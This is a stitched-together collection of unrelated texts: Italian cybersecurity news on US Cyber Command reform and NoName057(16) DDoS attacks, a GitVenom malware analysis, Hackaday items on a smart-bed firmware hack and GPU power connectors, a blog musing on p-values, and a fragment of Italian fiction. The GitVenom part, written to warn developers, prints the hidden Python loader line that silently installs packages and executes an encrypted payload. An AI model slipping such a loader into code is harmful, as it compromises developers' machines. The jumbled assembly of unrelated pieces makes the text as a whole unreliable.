Il Segretario alla Difesa degli Stati Uniti, Pete Hegseth, ha ordinato al Cyber ​​Command degli Stati Uniti (USCYBERCOM) di accelerare i preparativi per un importante sforzo di modernizzazione noto come “Cyber ​​Command 2.0”. Invece dei 180 giorni previsti per elaborare un piano per attuare la riforma, il comando ora dato solo 45 giorni, il che gli impone di presentare il documento finale entro e non oltre il 22 marzo. Questa inaspettata riduzione dei tempi rappresenta una sfida significativa per la dirigenza dell’USCYBERCOM, in quanto richiede di riconsiderare una serie di processi chiave in un lasso di tempo ridotto.

Motivi per accelerare la riforma

Il piano “Cyber ​​​​Command 2.0” era stato originariamente approvato alla fine dell’anno scorso dall’ex Segretario alla Difesa Lloyd Austin. Tuttavia, da quando è salita al potere la nuova amministrazione di Donald Trump, le priorità della politica informatica degli Stati Uniti sono cambiate in modo significativo. Il nuovo team della Casa Bianca sta spingendo per un’azione più decisa e aggressiva nel cyberspazio, soprattutto in seguito ai recenti attacchi e alle operazioni di spionaggio da parte della Cina.

Secondo fonti a conoscenza della situazione, Hegseth, dopo aver preso conoscenza della bozza il 5 febbraio, ha chiesto al comando non solo di accelerare lo sviluppo della riforma, ma anche di preparare un elenco di poteri necessari per migliorare l’efficacia delle operazioni. Inoltre, il Pentagono ha ordinato l’identificazione delle limitazioni normative che impediscono alle forze informatiche statunitensi di operare in modo più rapido ed efficace.

Cosa cambia allo US Cyber ​​Command?

Gli ambiti chiave della riforma erano:

• Istituzione di un centro di innovazione per la guerra informatica che garantisca una stretta cooperazione tra l’esercito e le aziende tecnologiche private.
• Sviluppo di un nuovo centro di eccellenza per la formazione informatica al fine di ampliare la formazione in tutto il sistema militare.
• Introduzione di un nuovo modello per la formazione di unità informatiche in vari rami delle forze armate.
• Sviluppare una strategia di gestione dei talenti che includa un sistema unificato di pagamenti, bonus e fidelizzazione dei dipendenti.

Queste misure sono progettate non solo per modernizzare il Cyber ​​Command, ma anche per creare un sistema di difesa informatica statunitense più flessibile e reattivo, in grado di adattarsi ai rapidi cambiamenti delle minacce.

Revisione dei poteri e nuove regole del gioco

Sebbene i dettagli esatti della riforma non siano ancora stati resi noti, la Commissione per i servizi armati della Camera sarebbe stata informata sul progetto e i senatori e i loro assistenti avrebbero ricevuto presentazioni preliminari. Nell’ambito della riforma, il Cyber ​​Command degli Stati Uniti sta anche sviluppando un’analisi delle potenziali nuove autorità che potrebbero essere necessarie per l’azione operativa.

Le fonti sottolineano che la richiesta di ampliare l’autorità del Cyber ​​Command non è nuova. Un processo simile si era già verificato nel 2017 sotto la prima amministrazione Trump. Sempre nel 2020 è stato condotto uno studio completo di tutti i comandi combattenti degli Stati Uniti, che ha portato all’ampliamento del Cyber ​​Command con l’inclusione di altri 14 comandi.

La sfida principale è la mancanza di tempo

Nonostante l’alto livello di sostegno alla riforma, alcuni esperti temono che scadenze così ravvicinate possano complicare il processo di coordinamento della modernizzazione tra i diversi rami delle forze armate.

Un funzionario ha affermato che i tempi sono troppo stretti perché i servizi militari e il Cyber ​​Command degli Stati Uniti raggiungano un accordo sulla condivisione delle risorse. Molto probabilmente il comando preparerà un piano, che verrà prima presentato al Pentagono e poi sottoposto all’approvazione dell’esercito.

Altri esperti ritengono che i principali disaccordi siano già noti e che il compito di Hegseth sia quello di contribuire a risolverli. In caso di questioni controverse, potrà proporre soluzioni specifiche e accelerare il processo di riforma.

“Coinvolgimento continuo” invece di transazioni una tantum

Un altro aspetto importante della riforma sarà il passaggio da operazioni informatiche una tantum a campagne strategiche a lungo termine. Questo concetto si basa sulla strategia Defend Forward, sancita per la prima volta nella dottrina informatica del Pentagono nel 2018. Si tratta di contrastare attivamente le minacce il più vicino possibile alla fonte, anziché limitarsi a proteggere i sistemi che sono già stati attaccati.

La nuova strategia privilegia l’impegno continuo con il nemico piuttosto che operazioni mirate occasionali. Ciò consentirà a Cyber ​​Command di gestire le risorse in modo più flessibile, rispondere più rapidamente alle minacce ed evitare lungaggini burocratiche.

In particolare, si sta discutendo sulla possibilità di semplificare la procedura di approvazione degli attacchi digitali, il che consentirà ai comandanti di prendere decisioni più rapidamente, anziché attendere un’approvazione in più fasi. Un approccio simile era già stato utilizzato nel 2018, quando l’amministrazione Trump aveva reso più facile lanciare attacchi informatici contro le campagne di disinformazione russe.

Prospettive per la riforma del “Cyber ​​​​Command 2.0”

Resta aperta la questione su quale sarà il documento finale che USCYBERCOM presenterà al Pentagono. Secondo gli esperti, con ogni probabilità includerà sia indicatori di performance specifici sia obiettivi flessibili a lungo termine che consentiranno al team di adattarsi alle nuove sfide.

Se implementato, il nuovo approccio cambierebbe in modo significativo il modo in cui opera il Cyber ​​Command degli Stati Uniti. Si creerà un sistema di guerra digitale efficace e autonomo, in grado non solo di rispondere agli attacchi, ma anche di prevenire attivamente le minacce in una fase iniziale.

Il cyberspazio sta sempre di più diventando la nuova arena di scontro globale e gli Stati Uniti cercano non solo di mantenere, ma anche di rafforzare il loro predominio in questo ambito.

L'articolo Cyber Command 2.0: Gli USA accelerano la guerra digitale contro Cina e Russia proviene da il blog della sicurezza informatica.

In our modern world, it’s difficult to underestimate the impact that open-source code has on software development. Over the years, the global community has managed to publish a tremendous number of projects with freely accessible code that can be viewed and enhanced by anyone on the planet. Very frequently, code published on the Internet serves as a source of inspiration for software developers – whenever they need to implement a project feature, they often check whether the code they need is already available online. This way, they avoid reinventing the wheel and thus save their precious time.

With more and more open-source projects being published, both state-sponsored actors and cybercriminals started using freely available code as a lure to infect their targets. Of course, this trend shows no sign of slowing down as evidenced by a currently active campaign aimed at GitHub users that we dubbed GitVenom.

Promise-filled yet fake projects

Over the course of the GitVenom campaign, the threat actors behind it have created hundreds of repositories on GitHub that contain fake projects with malicious code – for example, an automation instrument for interacting with Instagram accounts, a Telegram bot allowing to manage Bitcoin wallets, and a hacking tool for the video game Valorant.

Clearly, in designing these fake projects, the actors went to great lengths to make the repositories appear legitimate to potential targets. For instance, the malicious repositories we discovered contained well-designed README.md files, possibly generated using AI tools. We observed these files to contain information about the projects, as well as instructions on how to compile their code.

Snippets of README.md pages with descriptions of fake projects

In addition to that, the attackers added multiple tags to their repositories, as well as artificially inflated the number of commits made to them. To do that, they placed a timestamp file in these repositories, which was updated every few minutes:

Example structure of a malicious repository

Malicious code implanted in many ways

While analyzing repositories created over the course of the GitVenom campaign, we noted that the fake projects we found were written in multiple programming languages – specifically Python, JavaScript, C, C++ and C#. As may be expected, these projects did not implement the features discussed in the README.md file, and their code mostly performed meaningless actions. At the same time, each of the projects was infected with malicious code, with its placement depending on the programming language used.

For instance, the attackers placed malicious code in Python-based projects by inserting a long line in one of the project files. This line consisted of about 2,000 tab characters, followed by the following code, responsible for decrypting and executing a Python script:
subprocess.run(['pip', 'install', 'cryptography'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL); subprocess.run(['pip', 'install', 'fernet'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL); from fernet import Fernet; import requests; exec(Fernet(b'<encrypted malicious Python script>'))
In the case of projects coded in JavaScript, the attackers created a malicious function inside them, which was in turn invoked from the main file of the project. Below is an example of such a function:

Example of a malicious function placed in JavaScript-based projects. It decodes a script from Base64 and executes it.

As for repositories containing C, C++ and C# code, the attackers decided to hide a malicious batch script inside Visual Studio project files, configuring it to execute at project build time:

Snippet from a malicious Visual Studio project file. It contains a PreBuildEvent attribute, which instructs the payload to execute at project build time.

Further payloads deployed

While coded in different programming languages, the malicious payloads stored inside the fake projects had the same goal – download further malicious components from an attacker-controlled GitHub repository (URL at the time of research:
hxxps://github[.]com/Dipo17/battle) and execute them. These components were as follows:

• A Node.js stealer that collects information such as saved credentials, cryptocurrency wallet data and browsing history, packs it into a .7z archive and uploads it to the attackers via Telegram.

Structure of the archive which the stealer sends to the attackers

• The open-source AsyncRAT implant (C2 server address: 68.81[.]155);
• The open-source Quasar backdoor (C2 server address: same as above)
• A clipboard hijacker, which searches the clipboard contents for cryptocurrency wallet addresses and replaces them with attacker-controlled ones. Notably, the attacker-controlled Bitcoin wallet (ID: bc1qtxlz2m6r[...]yspzt) received a lump sum of about 5 BTC (approximately 485,000 USD at the time of research) in November 2024.

Impact of the campaign

While investigating malicious repositories related to the GitVenom campaign, we found several fake projects published two years ago. Given that the attackers have been luring victims with these projects for several years, the infection vector is likely quite efficient. In fact, based on our telemetry, infection attempts related to GitVenom have been observed worldwide, with the highest number of them being in Russia, Brazil and Turkey. We expect these attempts to continue in the future, possibly with small changes in the TTPs.

Blindly running code from GitHub can be detrimental

As code-sharing platforms such as GitHub are used by millions of developers worldwide, threat actors will certainly continue using fake software as an infection lure. For that reason, it is crucial to handle processing of third-party code very carefully. Before attempting to run such code or integrate it into an existing project, it is paramount to thoroughly check what actions it performs. This way, it will be very easy to spot fake projects and prevent malicious code placed in them from being used to compromise the development environment.

Reference hashes for infected repository archives

63739e000601afde38570bfb9c8ba589 (06d0d13a4ce73775cf94a4a4f2314490de1d5b9af12db8ba9b01cd14222a2756)

3684907e595cd04bf30b27d21580a7c6 (bd44a831ecf463756e106668ac877c6b66a2c0b954d13d6f311800e75e9c6678)

securelist.com/gitvenom-campai…

Work in progress

Gnocchi alla romana with Carbonara sauce

[Dylan] has a fancy bed that can be set to any temperature. Apparently this set him back about $2,000, it only works if it has Internet, and the bed wants $19 a month for anything beyond basic features. Unsurprisingly, [Dylan] decided to try to hack the mattress firmware and share what he learned with us.

Oddly enough, it was easy to just ask the update URL for the firmware and download it. Inside, it turned out there was a mechanism for “eng@eightsleep.com” to remotely SSH into any bed and — well — do just about anything. You may wonder why anyone wants to gain control of your bed. But if you are on the network, this could be a perfect place to launch an attack on the network and beyond.

Of course, they can also figure out when you sleep, if you sleep alone or not, and, of course, when no one is in the bed. But if those things bother you, maybe don’t get an Internet-connected bed.

Oddly enough, the last time we saw a bed hack, it was from [Dillan], not [Dylan]. Just because you don’t want Big Sleep to know when you are in bed doesn’t mean it isn’t useful for your private purposes.

hackaday.com/2025/02/24/unhack…

Gli hacker di NoName057(16) continuano le loro attività ostili contro diversi obiettivi italiani, attraverso attacchi di Distributed Denial-of-Service (DDoS).

Questa volta a farne le spese sono le regioni italiane, i comuni e alcuni siti istituzionali delle città italiane. Al momento mentre scriviamo risulta offline il sito della Regione Lazio e il Comune di Taranto, mentre il sito del Comune di Roma risulta attivo.

NoName057(16) è un gruppo di hacker che si è dichiarato a marzo del 2022 a supporto della Federazione Russa. Hanno rivendicato la responsabilità di attacchi informatici a paesi come l’Ucraina, gli Stati Uniti e altri vari paesi europei. Questi attacchi vengono in genere eseguiti su agenzie governative, media e siti Web di società private.

La Regione Lazio ha pubblicato poco fa una pagina che riporta che al momento il sito non risulta raggiungibile in quanto in manutenzione

Che cos’è un attacco Distributed Denial of Service

Un attacco DDoS (Distributed Denial of Service) è un tipo di attacco informatico in cui vengono inviate una grande quantità di richieste a un server o a un sito web da molte macchine diverse contemporaneamente, al fine di sovraccaricare le risorse del server e renderlo inaccessibile ai suoi utenti legittimi.

Queste richieste possono essere inviate da un grande numero di dispositivi infetti da malware e controllati da un’organizzazione criminale, da una rete di computer compromessi chiamata botnet, o da altre fonti di traffico non legittime. L’obiettivo di un attacco DDoS è spesso quello di interrompere le attività online di un’organizzazione o di un’azienda, o di costringerla a pagare un riscatto per ripristinare l’accesso ai propri servizi online.

Gli attacchi DDoS possono causare danni significativi alle attività online di un’organizzazione, inclusi tempi di inattività prolungati, perdita di dati e danni reputazionali. Per proteggersi da questi attacchi, le organizzazioni possono adottare misure di sicurezza come la limitazione del traffico di rete proveniente da fonti sospette, l’utilizzo di servizi di protezione contro gli attacchi DDoS o la progettazione di sistemi resistenti agli attacchi DDoS.

Occorre precisare che gli attacchi di tipo DDoS, seppur provocano un disservizio temporaneo ai sistemi, non hanno impatti sulla Riservatezza e Integrità dei dati, ma solo sulla loro disponibilità. pertanto una volta concluso l’attacco DDoS, il sito riprende a funzionare esattamente come prima.

Che cos’è l’hacktivismo cibernetico

L’hacktivismo cibernetico è un movimento che si serve delle tecniche di hacking informatico per promuovere un messaggio politico o sociale. Gli hacktivisti usano le loro abilità informatiche per svolgere azioni online come l’accesso non autorizzato a siti web o a reti informatiche, la diffusione di informazioni riservate o il blocco dei servizi online di una determinata organizzazione.

L’obiettivo dell’hacktivismo cibernetico è di sensibilizzare l’opinione pubblica su questioni importanti come la libertà di espressione, la privacy, la libertà di accesso all’informazione o la lotta contro la censura online. Gli hacktivisti possono appartenere a gruppi organizzati o agire individualmente, ma in entrambi i casi utilizzano le loro competenze informatiche per creare un impatto sociale e politico.

È importante sottolineare che l’hacktivismo cibernetico non deve essere confuso con il cybercrime, ovvero la pratica di utilizzare le tecniche di hacking per scopi illeciti come il furto di dati personali o finanziari. Mentre il cybercrime è illegale, l’hacktivismo cibernetico può essere considerato legittimo se mira a portare all’attenzione pubblica questioni importanti e a favorire il dibattito democratico. Tuttavia, le azioni degli hacktivisti possono avere conseguenze legali e gli hacktivisti possono essere perseguiti per le loro azioni.

Chi sono gli hacktivisti di NoName057(16)

NoName057(16) è un gruppo di hacker che si è dichiarato a marzo del 2022 a supporto della Federazione Russa. Hanno rivendicato la responsabilità di attacchi informatici a paesi come l’Ucraina, gli Stati Uniti e altri vari paesi europei. Questi attacchi vengono in genere eseguiti su agenzie governative, media e siti Web di società private

Le informazioni sugli attacchi effettuati da NoName057(16) sono pubblicate nell’omonimo canale di messaggistica di Telegram. Secondo i media ucraini, il gruppo è anche coinvolto nell’invio di lettere di minaccia ai giornalisti ucraini. Gli hacker hanno guadagnato la loro popolarità durante una serie di massicci attacchi DDOS sui siti web lituani.

Le tecniche di attacco DDoS utilizzate dal gruppo sono miste, prediligendo la “Slow http attack”.

La tecnica del “Slow Http Attack”

L’attacco “Slow HTTP Attack” (l’articolo completo a questo link) è un tipo di attacco informatico che sfrutta una vulnerabilità dei server web. In questo tipo di attacco, l’attaccante invia molte richieste HTTP incomplete al server bersaglio, con lo scopo di tenere occupate le connessioni al server per un periodo prolungato e impedire l’accesso ai legittimi utenti del sito.

Nello specifico, l’attacco Slow HTTP sfrutta la modalità di funzionamento del protocollo HTTP, che prevede che una richiesta HTTP sia composta da tre parti: la richiesta, la risposta e il corpo del messaggio. L’attaccante invia molte richieste HTTP incomplete, in cui il corpo del messaggio viene inviato in modo molto lento o in modo incompleto, bloccando la connessione e impedendo al server di liberare le risorse necessarie per servire altre richieste.

Questo tipo di attacco è particolarmente difficile da rilevare e mitigare, poiché le richieste sembrano legittime, ma richiedono un tempo eccessivo per essere elaborate dal server. Gli attacchi Slow HTTP possono causare tempi di risposta molto lenti o tempi di inattività del server, rendendo impossibile l’accesso ai servizi online ospitati su quel sistema.

Per proteggersi da questi attacchi, le organizzazioni possono implementare soluzioni di sicurezza come l’uso di firewall applicativi (web application firewall o WAF), la limitazione delle connessioni al server e l’utilizzo di sistemi di rilevamento e mitigazione degli attacchi DDoS

L'articolo Ottavo giorno di attacchi DDoS! NoName057(16) colpisce Regioni, Comuni e Città Italiane proviene da il blog della sicurezza informatica.

When PCI-SIG introduced the 12VHPWR power connector as a replacement for the 6- and 8-pin PCIe power connectors, it created a wave of controversy. There were enough cases of melting GPUs, PSUs, and cables to set people on edge. Amidst this controversy, [JayzTwoCents] decided to do some scientific experimentation, Mythbusters-style, specifically: do these 12VHPWR (or the 12V-2×6 successor) wear out upon hitting the often cited 30 mating cycles? If this is the case, it could explain why people see wildly different current loads between the wires in their GPU power cables. Perhaps reviewers and hardware enthusiasts should replace their GPU power cables more often.

Like many Mythbuster experiments, the outcome is less than clear, as can be observed in the above graph from one data set. Even after 100 mating cycles, there was no observable change to the contact resistance. One caveat: this was only performed on the GPU side of the connector. The first cable tested was a newer connector type that uses a single-split leaf spring design. Initially, most of the 12VHPWR connectors had a double- or triple-dimple design to contact the pin, so [Jayz] tested one of these, too.

The amazing thing with the 2022-era cable that got pulled new out of packaging and tested was that it looked terrible under the microscope in terms of tolerances and provided a very uneven load, but it got better over time and also lasted 100 cycles. However, it must be said that ‘lasted’ is a big word here, as the retention tab wore off by this point, and the connector was ready to fall out with a light breeze.

Perhaps the ‘mating cycles’ specification is more about the connector as a whole, as well as how the connector is (ab)used, at which point good (long-term) contact is no longer assured. Along with the different types of Molex Mini- and Micro-Fit style connectors, it’s worth keeping an eye on with more applications than just GPUs.

We have certainly seen some burned connectors. Particularly in 3D printers.

youtube.com/embed/lAdLOf5of8Y?…

hackaday.com/2025/02/23/does-t…

Questa credo che sarebbe la conclusione della dimostrazione dell'ipotesi per cui 2+2 fa 4, se tale ipotesi fosse stata dimostrata tramite la #ricerca clinica. Ma cosa significa?
Significa che 2+2 fa 4 con una piccola variabilità, e che le probabilità che 4 sia il risultato dell'operazione per il solo effetto del caso sono molto, molto scarse. Scarse ma non nulle.
Questo accade perché in #medicina, in tutte le branche medico-scientifiche, e nella biologia in generale - tutte descritte come "scienze imperfette", le variabili in gioco sono talmente tante da non poter essere incluse tutte in una formula algebrica il cui risultato è matematicamente inoppugnabile.
Avete mai sentito un complottista obiettare che i numeri 3, 4 e 5 non rappresentino una terna (o triade? Perdonate l'ignoranza) pitagorica? O dire che l'area del rettangolo non è base per altezza? No. Perché esiste una certezza matematica che queste tesi siano vere, ed è impossibile dimostrare il contrario, nemmeno in una minima percentuale di casi.
Quel p < 0.05, invece, è il piccolo dettaglio che permette all'antintellettualismo di mettersi a tu per tu con gli scienziati. È la vostra parola contro quella di #ammiocuggino. Avete presente il nonno mancato a 98 anni di morte naturale fumando due pacchetti di sigarette al giorno? Ecco, si tratta di un confirmation #bias (cherry picking, nel linguaggio del web) talmente frequente, che i cimiteri italiani dovrebbero essere pieni di nonni highlander. Da molti, questa viene considerata la prova che il fumo non è poi così dannoso; per chi ha un minimo di intelligenza critica, invece, è solamente l'eccezione che conferma la regola.

Non entrerò nel dettaglio di come, in Italia, l'antintellettualismo e l'analfabetismo funzionale spianino la strada, anche da un punto di vista legislativo, alle pseudoscienze. Forse tratterò l'argomento nei prossimi tempi, e questo post potrebbe essere una buona introduzione. Per il momento, è solo un piccolo spunto di riflessione per intuire quanto rigore scientifico e quanto lavoro - spesso malretribuito - ci siano dietro ad un #trial clinico, e di quanto queste pratiche siano misconosciute ai più, creando situazioni equivoche in cui, potenzialmente, chiunque può tirare acqua al proprio mulino.

Driiiiinnnn Driiiinnnn

Lo schermo del telefonino illumina con la sua luce fioca il comodino di Anna, proiettando ombre inquietanti sulle pareti della stanza buia.

Driiiiinnnn Driiiinnnn

"Adesso chi è?" si chiede Anna mettendo il naso fuori dalle coperte con estrema riluttanza, facendo una smorfia di fastidio mentre cerca di sopportare il trillo insistente del telefono che come un picchio impazzito perforava la sua testa dolorante.

"Uff, mia sorella! La chiamo dopo"

e si rintana di nuovo sotto le coperte, cercando rifugio nel calore familiare.

"Mia sorella! Cazzo vuole a quest'ora! E quello là figurarsi se si degna di chiamare, non l'ha mai fatto, aspetta sempre che sia io ad andare là a riverirlo come una serva! LUI deve venire qui altrimenti non muovo un dito, questa volta basta!"

Era attraversata da un fiume impetuoso di rabbia incontrollabile, al punto tale che certe volte si trasformava in tremori violenti e pianti disperati che sembravano non avere fine.

"Ogni singola volta la stessa maledetta storia. Dice che sono io quella che va via e invece è lui che mi caccia via con i suoi comportamenti! Con i suoi modi cafoni da persona incivile, la sua arroganza insopportabile, la sua prepotenza che non conosce limiti!! Perché continuo ostinatamente a mettermi sempre con uomini del genere? Cosa avrò mai fatto di male nella vita per meritarmi questo?"

( Collapse )
Nel buio più totale della stanza allungò la mano tremante per cercare a tentoni un fazzoletto di carta, asciugarsi gli occhi gonfi di pianto e poi buttarlo con rabbia a terra, ad unirsi agli altri a formare un tappeto bianco intriso di dolore e delusione.

"Ogni dannata volta mi promette solennemente che non succederà più ma invece eccomi qui di nuovo, a piangere da sola nel letto come una stupida ad aspettare un minimo segno che dimostri che non sono completamente invisibile ai suoi occhi! Poi io, come al solito, lo implorerò disperatamente e lui si degnerà di venire qui, sempre dopo estenuanti preghiere, e io, come una perfetta idiota, accetterò ancora una volta le sue scuse vuote! MI ODIO PROFONDAMENTE PER QUESTO!"

Proruppe in una nuova serie di singhiozzi incontrollati e si rintanò completamente in lacrime sotto le coperte serrando gli occhi con forza, cercando di sfuggire alla realtà che la circondava.